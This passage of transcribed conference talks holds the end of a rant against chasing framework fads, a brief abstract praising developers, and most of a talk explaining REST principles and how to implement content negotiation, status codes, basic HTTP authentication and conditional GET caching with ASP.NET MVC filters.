going. Right? And if you're doing.NET today, you're so, so two years ago. Oh,.NET. Oh, that's for losers. Today it's Ruby. No, actually that was yesterday. Today it's Node. Right? Why? Oh, well, because all the innovation is happening in Ruby. Bullshit. Innovation is not about a framework. Innovation is not about a language feature. Innovation is about how you are impacting people, how you're changing their lives, how you are developing the product that changes their lives. It's not about language features. Technologies help you. But we're so obsessed with this and the social pressure and all you got to learn this or you got to learn that or you got to do this or what happens if the world starts to go to a non-managed language and I'm in a managed environment or what am I going to do? Look for the balance. There are people solving today problems, helping people using Delphi or Delphi still and they're doing a pretty damn good job about it. And they're spending their time solving problems, not having debates or saying, oh, you're a loser because you're not doing node today. And then we hook onto these technologies and use them without actually thinking of the consequences. We don't ask the non-technical questions. We say, oh, will it scale? Right? What about the non-technical questions? What about will it outweigh the benefit that it will impose on my company? Not on me. Oh, I gain experience. But what about on my company? How many times have you used a framework? You've gone from N unit to use MS test or use from MS test to X unit for one minor change, right? What is the benefit of that? What are you gaining? Because Joe is using it. How many times have you changed an ORM? Every time you use a new ORM in a new project, would you say that you have used it perfectly? No, we all make mistakes the first time we use things, right? We learn as we go along. Do we think about that impact? So yes, sometimes it calls for changing things. Sometimes it calls for using a different framework, but not for the sake of it, not to learn. Because we know that the first time we use it, we're going to screw up anyway. And what about the legacy that we leave behind? We go from one ORM to another or another or who's going to maintain it? Oh, the guy that comes after me. I mean, especially with the outburst of open source projects and everything nowadays, now everyone throws something up on GitHub or whatever or codeplex, whatever, you go put it down, work with it. And then the guy goes, Oh, I'm sick of this. I'm bored. I'm going to move on to something else. And you're like, Well, I use it for that. I'll move on to something else. And then someone, poor Joe comes to your company and like, What the hell is this? Oh, I'll just click on the documentation. Oh, you are not found. Oh, page not found. Oh, what benefit did that new framework or that new testing framework or this or that add to you or to your benefit to your company for you to make that decision to switch? If it wasn't only about, Oh, well, I'll learn something new. And maybe it will help. Remember how Twitter used Ruby and everyone said, Well, oh, well, Twitter Ruby Ruby must be great. Twitter is using it. Yes, an organization that has no business plan, right? The number, you know, the how I'll get set up a credit, create a product, get the users bleep bleep bleep and become rich, right? Twitter to date still doesn't have bleep bleep bleep. And not only that, they went back to Java for certain things. They said, Well, this dynamic thing isn't that maintainable. We're going back to Java. And everyone said, Oh, yeah, now, but they just don't understand. Oh, when it was time to say, Oh, let's use Ruby because Twitter is using it, you were fine. But now they're like, it is. And when I say Ruby, I say anything I say manga, I say cal anything, I'm not picking on a certain technology. I'm just saying, are we asking the right questions when we're making these choices? You know, what are we trying to accomplish here? What is it that we're trying to solve? But anyway, that's enough. Okay, I'm, I've, I'm angry enough. And I'm going to stop. Okay. But you know, we have a really challenging profession. I mean, think about it. This is a manufacturing plant. And then I'm not picking on this profession. But how many professions are there in this world that are like this, that you have to do the same thing over and over and over and over and over again. Right? Yet for us each day, I mean, I wake up every morning really excited about my work. Because it's a challenge. It's a challenge. And it's not a challenge because I'm going to learn something new necessarily. I think of it as a challenge of how I'm going to help improve what I am doing. We are faced with problems. We have to solve problems. We have to solve problems. We have to solve algorithms. We have to solve technical difficulties. We have a challenging life. It doesn't get boring. So let's not try and make it less boring by focusing on things that don't have relevance. I mean, we have one of the most amazing professions along with people like engineers along with people like doctors, obviously doctors save lives, but we can impact lives. I don't know how many of you went to see Guy's session on mind control. How many of you went to see that? Right? He was putting a sensor on his head and the sensor was reading his eye going left or right or him smiling and it was moving a computer. This helps people that have physical impediments. We can save, make people's lives better. Very few professions in the world have that. And the beauty of this is that you don't need a master's degree to do it. You just need to have passion and concentrate on what you have to concentrate. Right? So we can do better focusing on what we need to improve. And as Aral was saying, and I use this with his permission, not only make other people feel like Superman, but ourselves be Superman because we helped others feel good. And we don't do that by wasting our time on stupidities. And there's been far too many stupidities going along lately. Okay? So to sum up just one word, focus on or one sentence, focus on what it is you need to focus on and don't lose the plot. Okay? That is the epiphany of unicorn craze that we have as developers. I wanted to find something that was truly shocking. And thanks to Philip, I managed to succeed. Okay? So that's it people. We're 10 minutes short, which if you want, I can continue to bitch. No, I will let you go. That is my details. I very much appreciate it. I hope you at least had a laugh because content-wise, it was empty. But thank you very much.
|
Our job is one of the most demanding and hardest. We play a crucial part in the business, often misunderstood and wrongly managed. We are craftsmen. We are under-appreciated, under-valued and often under-paid. Look at the world today. It's made up of people like us, people like Mike Zuckerberg et al. We are the fundamental pilar to businesses of the 21st Century. We are the Prima Donna's. It's about time you treat us like one.
|
10.5446/50968 (DOI)
|
So, on, on, on. You can hear me? Yes. Good. Good afternoon. Hi. Hi. Hello. Good afternoon. Good afternoon. Are you tired? I didn't get that. Are you tired? No. Oh, good. It's Friday. How many of you have been here for the last time? I've been here for the last time. I've been here for the last time. It's Friday. How many of you have been here for the whole week, including workshops? I must be tiring, huh? Right. So I'll make this session very short and sweet. It won't be too complicated and it'll be quite easy to follow along, hopefully. If you are here, this is a talk on REST with ASP.NET MVC. And the main agenda here is a brief introduction to REST. Right? So how many of you here know what REST is? Have been working with RESTful systems. Okay. So, we're going to rehash what REST is, just in case for the people that aren't too clear on the topic. And then I'm going to show you how you can leverage ASP.NET MVC to do REST. Okay? Or create RESTful systems. Now, one word of warning. How many of you are here to see Web API? Okay. If you are, you're in the wrong room. Right? I'm not going to show Web API. I'll explain why I won't show it later on. It's not that I don't like the technology. It's just I think it's not relevant, or at least to this talk. Okay? So don't say I didn't warn you. And cheer up, please. Really, don't be so gloomy. It's okay. Did anyone come to my morning talk? Right. Everything I said, don't hold it against me. I love you all. Really, I do. Today, I'm a developer again this afternoon. So let's think Web. Right? And if I say to you Web, what do you think? Yeah, you're going to speak louder than that. What else? JavaScript. What else? JavaScript. What? You took the worst part of the Web and brought it out. Pardon? Freeform. Freeform. Free porn. It's free? Oh. Okay. I wasn't thinking about porn. Distribute architecture. Would you agree that the Web is a distributed platform? Would you agree that we can accomplish scalability with it? That we think about scalability when we think Web? About statelessness and cache because those are inherent in the way the Web works? A simple interface? I mean, it doesn't get much simpler than the Web. Right? Go to a page, get a page, post some data, get some data back. It's as simple as it gets. If you want to go somewhere, you click on a link. If you want to fill something out, you fill a form. It doesn't get simpler than that. And loose coupling, which it allows us to do because we have these things like server farms and we have failovers and we have Azure and we have EC2 and we have all these different things that allow us to create loose coupling for our system so that one doesn't fail if the other one fails, et cetera. Now let's think about system design. What are the goals that we try and accomplish in system design? Well, the big one, I hope, is maintainability. Yeah? I mean, we're assuming already that the system works the way it should and everything and we've talked to the customer and all that dandy stuff is all over and done with. In terms of a technical point of view, we try and maintain maintainability. Right? We try and accomplish that so that we can create a system that can work and we can maintain it over time. We try and create a system that is reliable for those of us that work in very, very large projects that are very successful, that are accessed by millions of users in one hour intervals. How many of them are there hidden in this room? One? Okay. You look for scalability. And we also try and accomplish simplicity. We try and make the simplest kind of interface. No, we don't. That's, we aim to try and make the simplest kind of interface. That's not really valid. I'll take that one out. But if you take these goals and you put them along the goals of the web, you kind of see that somehow you can try and match these things up. Not to a one to one that I've put there necessarily, but you can try and see a common ground between what we do when we design systems and the way the web works. So that's REST. That's it. That is the whole idea behind REST. The whole idea behind REST is to look at the way the web has worked and try and project that to the way we create our systems. That's it. REST stands for Representational State Transfer, and it was written by a guy called Roy Fielding in his dissertation. It's based on how the web works. So what Roy did said, you know, the web has offered us a whole bunch of things, all the ones that I've mentioned, among other things. If I were to somehow create my systems so that they offer me these same things, that would be pretty awesome. How do I go about doing that? How can I leverage everything that the web has offered in my systems? And that's when he came up with a series of constraints. And he realized that the way the web works requires specific constraints to be put in place. And if we follow these constraints, then we achieve what the web achieves. So if we can somehow take our system design and put in a series of constraints, a bay, a series of constraints, we can potentially obtain the same thing the web has, which is in common with a lot of things that we try and accomplish when we create systems. So REST is nothing more than a series of constraints. REST is not an HTTP API, right? There are many systems, many systems out there that have RESTful interfaces, yes, and interfaces. More like RESTless, because they are not RESTful. Now, can you call them REST interfaces? Sure. You can call a dog a pony as well. But what are you accomplishing? It's not about being dogmatic. It's not about saying, oh, you idiot, it doesn't matter that you call that a REST and it's not REST. Don't get so worked up. It is. It does matter because we should call things for what they are. Among other reasons is because people that are not familiar with the concepts will just get confused. And then they'll look at your system and they'll say, where are all these promises that you promised me? It's not there. And this is a RESTful system. No, actually, it's not. So that's why you don't have those things, right? So it's very important to distinguish a RESTful system from an HTTP API, which is what the vast majority of systems out there are. We've even been guilty of that. We have a product at JetBrains, which we say it's got a RESTful API. It does not. And we're pushing to change it or at least rename it. So let's not distinguish. Let's distinguish the two. HTTP API means I have an interface where you can use HTTP to talk to me. That's it. Nothing more. So Leonard Richardson has a book that I recommend at the end of this talk. He came up with this idea of the Richardson maturity model, which basically defines different levels of RESTfulness. And I say RESTfulness in quotes because it's not REST. According to Roy, the only true REST is level three. That is when you call a RESTful system. Everything below that is not REST. But this is a good system in order to allow you to understand what a RESTful system is. And we build up on this to get to what REST is. So it's very good to look at what we have actually and build up on it to see where we want to go. Level zero is POX or plain old XML. And this is what the vast majority of systems are. I have an HTTP endpoint and I post some information. Normally I do it in an XML where I define the method call. I define the parameters and I send that over. That's it. That's all I have. And every single operation that I want to perform is a post and the XML contains the operation. So if I want to get a list of customers, I would say get list customers and send it in that package. And do a post. If I say add a new customer, the operation would be add new customer. Here are the parameters. Post. That's level zero. And that's what a lot of systems are. Then we go to level one, which we start to identify this concept of resource, which is fundamental to REST. And we'll cover it a little bit more in detail in a minute. But we get to level one. And here we start to say, okay, well, now I'm not going to have kind of like just one single endpoint. I'll start to have more endpoints. But I still kind of focus on single verbs. But I start to try and create a distinguishment between what these different endpoints are. I don't necessarily identify them as what a resource is, which we'll see, but there can even be operations, et cetera. Then we get to level two. And this is where everyone says, oh, I've reached restfulness. This is the majority of systems out there that say I'm REST. And this basically is, oh, I see HTTP has verbs. Let me use them. Get, put, post, delete, options, head. Right. So now when I want to get a customer, I use get. When I want to create a customer, I use post. When I want to edit a customer, I use put. And I've accomplished REST. No, you've just saved yourself some trouble by not defining operations, but you haven't accomplished REST. Now I keep talking about HTTP and I'll get to a moment later on about if HTTP is important in REST or not. Level three, which is REST is hypermedia. That is the fundamental pillar of REST, which gives us a lot of the benefits that we're talking about. About scalability, about maintainability, about flexibility. All the abilities you think of, it's at level three. Okay. We'll start at level two. We're going to start at where we assume that we have verbs and we have resources. So what is a resource? Anything can be a resource. Anything. A customer can be a resource. A customer list can be a resource. An employee can be a resource. An order can be a resource. A shipping requirement can be a resource. A shipping dispatch can be a resource. A lot of times when people start to look at this REST thing and we talk about resources, the first problem that comes to mind is, okay, I understand the customer is a resource. I understand an order is a resource. What about things that aren't entities? And we'll see how we deal with that. A resource is identified with a URI. Uniquely identifies a single resource, a URL. Then we have representation of resources. So if I access a URL and I say, give me back customer 25 or give me back customer Joe, I can send that customer back using text HTML, which is the page that you see when you go to your website. But I can say, you know what, give me back that customer in application JSON. Or give me back that customer in XML. So I can have different representations of a customer. I could even request a customer as an image and it would give me back the picture of the customer. So we have resources and we have representation of resources. So one resource has multiple representations. When we want to request these different representations, we can do it in various ways. And there is no one way that is rest and the other way that is not rest. It's just who is doing it and you can provide one way the other way both ways to provide more flexibility. So if I'm in a browser as a human being, I go and I type customer slash 25.json. And I can get back a JSON representation of my customer. What use would it be to me as a user very little? As a developer, it would make more sense because people want to see web pages when they see customers, not JSON. And I can request that using different URIs or I can request it using this thing called content negotiation. Content negotiation is basically a header in HTTP that the browser sends to the server and says, give me back this resource in this media format. So by default, when you make a request to a URL, by default, the browser says, give me back a resource in text slash HTML. And the server says, here you go. And if you don't have text HTML, you can supply a different format as well. So you can say, give me back in text HTML. And if you don't have text HTML, give me back application XML. And if you don't have application XML, give me back application JSON. And the server will say, I have text HTML. Here you go. If it didn't have it, it would say, but I do have application XML. I'll give you back that. That is why it's called negotiation. Because it negotiates different possibilities and it has fallback options. So we can request a resource in a different representation with either of the two ways. Nothing is more rest than the other. We can even notice here, I have a URL that is pointing to an article that is in Spanish. I can use that or I can use the accept language, which is another header in HTTP, which allows me to specify the language. Okay. Here is one of the most important things of rest, apart from hypermedia, which this is where we start to see the benefit. Rest is based on a uniform set of operations. That means that what I can do in rest is limited. I have a resource. I have a representation of the resource. And what I can do with this is limited. I can create a resource. I can delete a resource. I can update a resource. I can see a resource. That's it. I can't do more. Okay. And there's two important things here. First of all, does this mean that rest is specific to HTTP? No, it does not. It just says these were the verbs that were in HTTP because this was based off of how HTTP works and these are the constraints. The other important thing is what happens when I can't identify something as a rest. So here is a typical scenario that you have when you're trying to do something in a restful way. You say to me, oh, you said I can create everything as a resource. Fine. I will create a customer as a resource. Right? And on that customer, all I can do is create it, delete it, update it, or read it. I can create an order as a resource. And all I can do with that order is what? Create, read, update, delete. How do I manage an operation which is ship order? If there is no verb which is ship order. It's how you think about it. Anything can be an order. Anything can be a resource. So instead of me having an order and an operation which is ship order, what would I have? I would have a resource which is order shipment and then I would create an order shipment. And I could update that order shipment and I can cancel that order shipment. So it's just how you envision the resources. What is the benefit of this constraint? Because this is one of the constraints I'm talking about. What is the benefit? Interoperability, among other things. We don't have to have wisdom anymore, right? What is one of the problems with technology such as SOAP? You have this big wisdom file and you have to figure out the method names, the parameters, etc. Here it's like that's all you can do. So as soon as you talk to a RESTful system, you know what you can do with it, right? That's all you can do. And if one system says you're not allowed to delete, it will throw back an error and say you don't delete. But you know that the operation delete is viable. And you don't have to worry about defining these operations. So now you say, right, I've got resources and I know what I can do with them. And that's all I can do with them. So it makes for simplicity and it makes for interoperability. It also leverages certain things such as idempotency and safety. What that means is that sometimes, because we all know that the network is not reliable, certain operations have to be safe. That means if I call it once or a hundred times, it doesn't make a difference. Get is one of those operations. Head is another one of those operations. If I make the call it fails, I know that I can make another call. So as long as you comply with this idempotency and safety, you're good to go. Because if the network fails, you just make another call. Again, complying with a constraint, gaining a benefit. Now here's one that is a lot of people say, is REST only based on HTTP? I mean, can I only use HTTP to do a RESTful system? No, you cannot. I mean, you don't have to. It was based on how HTTP works. It doesn't mean that it only was valid on HTTP. To date, though, I don't know of any other system that is RESTful that does not use HTTP. Right? And at this point, Roy Fielding does say that you have to remain pure and not use anything specific to HTTP. But there are certain abstractions that don't make sense. How many of you use an ORM? Okay. Enhypenate? Entity framework? How many of you have made a repository pattern over entity framework? How many of you have regretted it? How many of you have swapped out entity framework for Enhypenate? Or Enhypenate for entity framework? So we create these abstractions that hide very important and useful technology and usefulness that the system has in case one day we have to swap it out. There are times that abstraction doesn't make sense. And I think that when we're creating RESTful system, which the majority are on HTTP, there are certain things we have to leverage of the framework we're on, the protocol we're on. And in this case, it's HTTP. And HTTP is not a transport protocol. It is an application protocol, which is different. People think about HTTP as if it was TCP. It is not TCP. It is a very rich protocol that has headers, bodies, structure. It knows about different fields. It knows about operations. It has status codes. And yet we don't leverage these things. And this is important, and this is one of the distinctions that I make when I talk about why we shouldn't think about Web API and NBC separately. This is what you normally see in applications, right? If everything is OK, send back HTTP status code 200. If it is not, send back a 500. I mean the number of times that you see applications that any error is thrown back as a 500. Internal server error, right? It's kind of the same as the exceptions we do in our code. Well, if it also goes OK, do this. If not, just try catch and just do whatever. Don't distinguish type of exception. These are all the status codes that HTTP has. 200 is OK. 201 means I've created a new resource. It knows what a resource is. It has the concept of a resource. 202 is async operations. Do you know what that means? One of the myths of RESTful systems is I cannot create a synchronous code. Yes, you can. You fire a request, and if it's asynchronous, you send back a 202 with a content header saying, pull me here to find out how this is going. And then the client pulls you in five minutes. But inherently, it knows about asynchronous operations. Resources that have moved, resources that have been found, not found, bad requests. That is, you made a really bad request to my resource. You tried to do something you shouldn't. Unauthorized, I don't have permission. Forbidden, not found. Even conflicts. I've updated a resource. Someone else has updated a resource. There's been a conflict. And all these status codes exist, and all these status codes are similar to the way we require applications to act, and yet we don't leverage it. We just say 200 or 500. So then the question is, oh, wait, how do I send back error information in a RESTful system? You use the status codes. And in fact, these status codes are being enhanced now to provide more. Right, resources, representation, uniform, set of operations, and we have these things called status codes. But that is not enough to create applications. Why? Because among other things, applications need state. Now, remember I said the RESTful system should be scalable. If you have one server and everything is going to that server, and you're making requests to that server and you're using the memory of that server, is that going to be scalable? No. So now we have server farms, right? And we have cookies. Now we've got a problem with cookies, right? Now we have to have server affinity. The cookies have to remain to the same server. So now when a request comes in, it always goes to the same server. And we distribute requests with a load balancer among multiple servers. And these are all problems of scalability. Why? Because we continuously constantly start, try and store state on the server. And there are other ways to store state. And this is one of the powerful constraints of REST, which give it flexibility and scalability. It gives us scalability because if I say to you, in REST, you don't store any state on the server, already you've gained some scalability. Flexibility, why? We'll see. HATOS is the ultimate REST. That is the level we have to reach, which stands for hypermedia as the engine of application state. Awesome acronym. Does anybody know what that means? No, they couldn't just call it hypermedia. They called it hypermedia as the engine of application state. What's this? I got to wake you guys up. Come on, people, respond to me. Who said that? Well done. You have won a resharperized... No, I'm just... When you go to Amazon, you see a website, right? How many of you have seen the first version of Amazon like five, six, ten years ago? Has it evolved? Yeah? When Amazon evolves the website, do they call you and say, hey, we've evolved the website? Do you want to learn how the new website works? Do they? But you figure it out, right? Why? You got a page? You got links? You go to those links, you figure out what you can do. You go to a website, it's got links, you figure out what you can do. You drive the flow. You say, oh, I can go here, now I can go here, now I can go here, now I can go here. Right? I can go to the shopping cart and I can check out information. And before going to the shopping cart, I was here. As humans, we don't need a manual. We don't need to... Someone tell us what we can do in each state of the application. We figure it out. We discover it by looking at it. So, these links and the forms provide us with the flow through the program. Provide us discoverability through the program. They provide us with a flow of decoupling a state. As side effects, we get scalability. Why? What am I saying here? Take this same concept of links where I have a form and I can click on those links as a human being. Take that same concept of links and forms and now say one process can talk to another process in exactly the same way. So, I have resources. I have representation of resources. I have operations I can do on those resources. And now what I'm going to add are links. Every time you make a request with a get, I will send you back some information and I'll include some links. Every time you make a request with a post, I can send you some information and I can send you a form as well. And I can say fill out this form. And I'm going to send that back to you, you being the program, the application, the service that is talking to me. And you as that service are going to take that response and you're going to parse it and you're going to say, oh look, there are links here. Oh look, there's a form here. I can fill this out. I can go here. It's not complicated. It's taking the same concept of how the web works from human to machine and getting machine to machine to talk the same way. So now when I log into a site and I go to the first page and now I am the machine and I make this request to a resource and that resource is returned to me and that resource returns to me for links. What does that resource told me? What I can do, right? What has that resource also given me? Control of the state because now the client knows what state it's in. The server no longer has to maintain the state. The client knows now that it can go to these four links. But it's also giving me flexibility. How? Because if tomorrow the service decides to add a fifth link, will it break me? If my, the way I talk to a restful service is, oh, here's some links. Oh, there's a new one. I don't know what to do with this. I'll send an email out to the system administrator and say the service that you're talking to has just provided a new URL. This is it. Here's a link with information about what this URL contains, what you want to do with it. Do you want to adapt your system to use it? If you do, you know you got to do it in the next iteration. If you don't, we haven't broken everything. Versus soap and service contracts, we've just blown things up. And we got to make sure that all the clients are using the same version at the same time and everything's updated at the same time. Here we provide flexibility. The server is saying this is where you can go. This is what you can do. And it's pushing that state over to the client. That is rest. And if you don't have HATOS, if you don't use hypermedia, you don't get this benefit. So when people implement restful systems that just use HTTP and just use resources and representations, they're like, yeah, and what? What benefit did I get out of this? Not much. Where is all the restful promise? It's not there. Because you didn't do it right. You just called it a restful system. How do we define these links? Well, exactly the same we defined web pages. Yes, you can use HTML. Is it a good idea? Maybe not. Depends. People use classes to designate concepts, etc. You can use formats that you define yourself. You can use another format which is called ATOM. ATOM Publishing. ATOM Publishing has information about a link, who published it, when it was published, where to go from, etc. Or you can create your own custom formats. Where you say, instead of me giving back application JSON or application XML, I'll give back application slash VND, which stands for vendor, my company, the domain plus XML. Right? Do I have to have different formats for every domain in my company? No. You define that. I can have all my services inside my entire company under one hypermedia format. Does it make sense? A lot of times it doesn't. Does it make sense to break it up based on the domain? Yes, it makes sense based on the complexity of the domain. If it justifies it for itself, you break it up. You define this. Do you need to register this with any organization in order for it to work? No. Is it recommended? Yes. How public is your service? Is your service only going to talk to three different people? Yes. Does it matter if you register it? No. It depends. Right? Anytime you don't know something, you just say it depends. So with program flow, we start to get, we're sorry, with hypermedia, we start to get program flow. And one of the things we do, for instance, is a typical operation here is actually that is wrong. Let me just do a quick refactoring. I do post order and I send some information. The HTTP response code, which we just saw to a new resource being created is what? 201. So it's created. Why post? Well, normally post is identified with an operation where the URL, the resource you're pointing to is not known. When you create a new resource, often that is generated on the service side. Think for example, I add a new order and the order number is generated from the service. So as a client, how do I know what I just generated? You can actually use a link to define it, but there is also a header in HTTP, which is called location. And what location does is give you back the location of the new resource you just created. And now you have that resource. And now you can say, now with this resource, I can go and do this operation, or I can do that operation with it. The server creates the resource, sends you back links, sends you back enough information for you to know where to go next. This is a custom format. This is taken from the book rest in practice, which is also on the recommended list. You can find this online as well. It's a system called rest box by Ian and Jim, authors of the book, where they explain to you the flow of ordering coffee through a restful system. So I create some coffee. It gives me back the information about the type of coffee I've created. And then it says the status is expected payment. And here is the link you have to click on. Click the process call to make the next step. So the state is being pushed to the client. And if tomorrow, as in their example, a new offer comes out that you get a free donut, you just add a link and say offer free donut, click this. And if someone doesn't click it, if some process doesn't know about that, nothing happens. So knowing this, can we leverage ASP.net as a restful platform? Now, here is the part about, do I need HTTP API, sorry, web API and ASP.net NBC? Until recently, web API, if you've not heard about it, was under this umbrella of WCF. WCF normally is the acronym with, oh my God, XML. So they maybe thought it might be better to put it under some other product name, which is ASP.net NBC, which has kind of a good reputation. Of course, that leads us to what Microsoft always leads us, is like, okay, now what? Which one should I choose? And the patterns described on the web are, oh, when you want an API, so restful API, use web API. And then for your user interface, use ASP.net NBC. And if you came to my talk this morning, I kind of call that bullshit, right? Because my user interface is nothing more than one usage of my API. Why do I need to separate this out? To what benefit? Use either web API or use ASP.net NBC. Why should I separate it out? All you're doing by separating it out is adding more work to yourself. Because at some point, these two APIs are going to call the same kind of logic, same kind of business, same kind of pattern. At some point, you're going to duplicate work. To what end? So I'm not for that. You can use web API. It has content negotiation. It has routing. It has more resource oriented. It embraces request response, which that means that basically you've got a class with HTTP request, HTTP response. You can get access to that in NBC. With NBC, you have routing and you have a user interface. So with this guy, you don't have a view engine. But there is a project now which is called ASP.net Contrib, sorry, web API Contrib, which provides you view engine. With this one, you don't have content negotiation. But hopefully now in the demos that come from now to the end of this talk, I will show you how easy it is to extend NBC to try and do restful systems without having to do web API. Okay. And both offer extensibility. So you don't need the two heads. And definitely not the two controllers. Everyone here is familiar with ASP.net and NBC? Who's not? Okay, who is? Right. Just a quick recap. A request comes in. We have the concept of controllers, controllers called models, models, sorry, controllers called actions, actions called models, models give back data, whatever. That's the URL. Controller class, class, action, action method. Right? There we have a problem. Actions are operations. They're not resources. Do you see the mismatch? I have, if I put customer controller there, I now have to define operations on that customer. In rest, you don't define operations on a customer. The operations are known. Right? It's put get. So this is operation oriented versus rest is resource oriented. But we have these things called filters. And these filters, if you're not familiar with, are going to be very useful. In NBC, it's one of the best accessibility points. You got on result, on action executed, executing, executed, result executing, result executed. This happens before an action is executed. The next one happens after an action is executed. The result happens before the result is returned. And the on result executed happens after its return. And we can leverage this for a lot of things. I'll show you how. Verb routing. Let's switch over to code. Are you sick of PowerPoint? Are you sick of me? Oh, that's cruel. I'm losing my voice here because I feel that the microphone isn't loud enough. Is it loud enough? Well, you could tell me I could low my voice. I'm really, it's hurting here, people. So I'm just going to push the limit here. I have 2002 with an internal build of resharper. All hell can break loose. My mom always says if you're going to fail, fail with style. So here is my code. Now, everybody understands the mismatch. No, I have customer controller where I normally define methods and I have resources. There's a mismatch. Okay, so how can I bridge this mismatch? Well, here is one example. And don't just have faith in me. You won't have to do this ever. Here's an example. What this does basically is says I have a customer controller and I have details. I have delete. I have update. I have create, et cetera. Right? And what I want to do is I don't want to have to call. When I want to do a delete of a customer, I don't want to say customer delete 25. Right? I don't want that. What I want to do is customer 25, but instead of a get, I want to do a delete. That's what I'm trying to do. Now, in MVC what you can do, and in fact, in the first preview, you had to actually do this and then they made it the action name to be convention based on the method name. You can define an action name. So here what I'm saying is that every single action is called the same, which is a rest action. And then each one has different verbs. So this one will only work with a get. This one will only work with a delete. Okay? What does this single action name provide me? Well, I create a root where I say rest roots, customer ID, and then all of them are mapped to action, rest action. So when the root processing comes in, it's always going to call rest action. When it goes to execute rest action, it says I've got five methods of rest action. Which one do I execute? MVC can discriminate based on the verb. And then we'll just do the appropriate one. Right? How many of you like the solution? I'm hoping nobody. That is not a solution I want to do. Right? I'll show you another solution, which also I hope nobody likes that much. In this case, I have index, details, delete, update, create. And you see that I've not decorated anything with any verb. Right? Now let's go to the routing table. And what I have here is customer create, customer details, customer delete, customer update, etc. So all of these are going to go to the different roots. But I do have a routing constraint over here. And what this does is basically it makes sure that the request comes in, is mapped to the method that I say is allowed. Okay? Who likes this approach? Why don't you like this approach? Pardon? Too much configuration. And the other approach is too much repeating yourself. Right? Good. We'll come back to another way of doing this later. But that is how you map resources to, that is how you map operations to resources with MVC. Okay? Content negotiation. A lot of times when I see people using, or creating HTTP or RESTful systems, I see a method which is customer controller, method details. And then I see another one which is customer controller and the method details JSON. Has anyone ever done that? So you have one method that gives you back a customer view and another one that gives you back a customer in JSON. That's horrible, right? It's also horrible to have an if inside a single method telling you which format to give back. So what do we do here? This is content negotiation. I do action result get, get the customer by ID and I do return view. And if I call that from a browser, it will return to me a customer HTML page. If I call that from Fiddler or a process, it will also give me back an HTML page. If in the, if in the call I say give me back customer25.json, it will give me back that in JSON. But that is transparent and it's not visible there. Right? So what do I do? I don't even have a filter. No, because in MVC 4 and 3, they introduce the concept of global filters. So basically every action can have a filter applied to it. And I have an output content type filter global to my application. What this does is, and this is a very hacky solution. Okay? Normally you wouldn't do it like this, but it's just for simplicity's sake. What this does is basically say you can request different formats, different representations for me based on the URL, based on the content type, etc. So it provides all three options, right? The content header. First it sees if the URL has any.extension equals JSON. Or based on the query string, customer query exclamation URL, sorry, format equals JSON. Or the accept headers. Okay? So it first sees if a request is being made, that request, that requires a special format. If it does, then it gets extensions and it passes it to encode data. What is encode data? All this does is encode the data based on the format I've requested. So here I'm just using a JavaScript serializer. If I want XML, I'll use a XML serializer. So all this is actually is nothing more than creating an action filter attribute and overriding the on action executed. When an action is executed, I can check for a specific type of view result, see if it has a model. If it has a model, I'll see if it's requested a special format. If it has, I'll encode it in that special format and send it back. I do it once and it applies to everything. Again, you wouldn't have to have to do this manually either. But it's very simple to do. It's leveraging the filters. So now I have content negotiation system wide with no effort, one filter. Another thing that I said you need in state and restful systems or in HTTP based systems is status codes. Out of the box ASP.NET MVC doesn't ship with status codes. And here's where with their web API, they make a big deal. Oh, you have access to the request and the response. Here is an example of me creating a customer. So I create a new customer, I save it to a repository. And again, there are some things that are hacky here like this generate route. It's done for simplicity. But I say generate the route and then I do new post result. So instead of doing a new view result or whatever, I do a post result. What is post? Well, post just inherits from action result and it sets the header for me. It sets the status code to 201. It sets the description and then it adds the header location, which if you remember, I told you is required when you create a new resource. It now sends back the location of the new resource. Point being you do this once and it's done. Right. And you've abstracted away from HTTP in your code, but it's still HTTP. And it's very simple to do. Okay. One of the things with rest is authentication. The problem with doing cookie based authentication is that the cookie has to live on the server. Normally, depending on how you handle it, there are ways around that. But by default forms authentication in ASP.NET MVC uses cookie authentication with the cookie on the server or stored in a server farm. That's against the constraints of rest. Right. You can't put state on the server in rest. Normally, you can use another type of authentication, which is called HTTP authentication. This is home controller. Right. This is admin controller. And you see that I have a new attribute called HTTP off. What is that? That just overrides again. It inherits from action filter attribute and overrides on action executing. And this is a simple implementation of HTTP authentication. Basically, with HTTP authentication, when you go to somewhere that's protected, it sends back a header saying authentication is required. Then the browser pops up the dialog box requesting a username password. And what it does is send it to the server using base 64 encoding where you have the username colon password. Very unsecured. That's why with HTTP authentication, you have to either use message digest or SSL. But if I execute this, I'll show you. I can go to about us home. If I go to admin, I get dialog box popped up. ABC, ABC. And it goes to the server and it brings down the server. Right. So if I look at this, what I'm doing is on action executing, which is the filter that occurs right before an action is executed, I check to see if, sorry, where am I? Yeah, I checked to see if an authentication header has been sent. If it has, then I parse it, get the username and password. And I just hook on to CAS code access security in.NET, use the same concept of generic principle user identity. That's it. That's the only thing I have to set from there on. I can use all code access security just like you do with forms authentication. It's very simple. Okay. One other thing which is important for HTTP is caching. And this is actually very important. And I think that they don't have support for this even in Web API. But I again point is to show you the simplicity. Output cache, you know that exists in ASP.NET and NBC. So you can cache a specific resource. But there's another cache system in HTTP, which is called conditional get. So conditional get basically says, do a get, give me back the resource. Right. But if the resource is big and it hasn't changed, I don't want you to get it back. So what you can do is you can create like a hash of that resource and send back that header and say this is the resource hash. The client can say, oh, it hasn't changed. So I won't request it. If it has send it back to me. And that's using the concept of modified headers and e-tags. So here what I'm doing is saying, get me a customer and if the customer hasn't changed, then don't give it back to me. If it has, then give it back. Right. And I've put a new attribute that I've created which is called conditional cache. And if we click on this again using on action executed, what I do is I get the model because I'm assuming that the severe result and has a model. Obviously the error checkings would need to go in place here. And I say, okay, generate the e-tag for the model. So this is just taking the model, serializing and generating a hash. Some whatever you can base that on whatever you want. Then I check to see if an incoming tag e-tag has been sent, which is set to if non match. So basically what the client request is doing, the browser is doing is saying, if non match this value. So if it doesn't match this value, send it back to me. I see if that value has been sent. If it has, I compare the e-tag with the incoming tag. If it's the same, then I send back an HTTP status code result saying 304 not modified. If it is different or if it is blank, because it's never been sent, I then add a header called e-tag done conditional get implemented with a simple filter. But when you look at restful systems and you look at conditional gets, which is very good for scalability, you might get scared and say, oh, NSP.NET MVC doesn't support this done in four lines of code. Right. In Vnext, you can just drag and drop it. Oh, God, you guys are so asleep, aren't you? I've mentally taken a picture of every single person that's fallen asleep. So one thing I want to mention, much of what I've shown you, and this isn't a personal PIMP, okay. Much of what I have shown you is available in a project on GitHub called EasyMVC, which I haven't touched for two years. That's why I'm not trying to PIMP my own project, okay. But all the content negotiation, all the routing, all that is done. In fact, with EasyMVC, all you need to do is create a new project and follow some conventions. Remember how I did the mapping 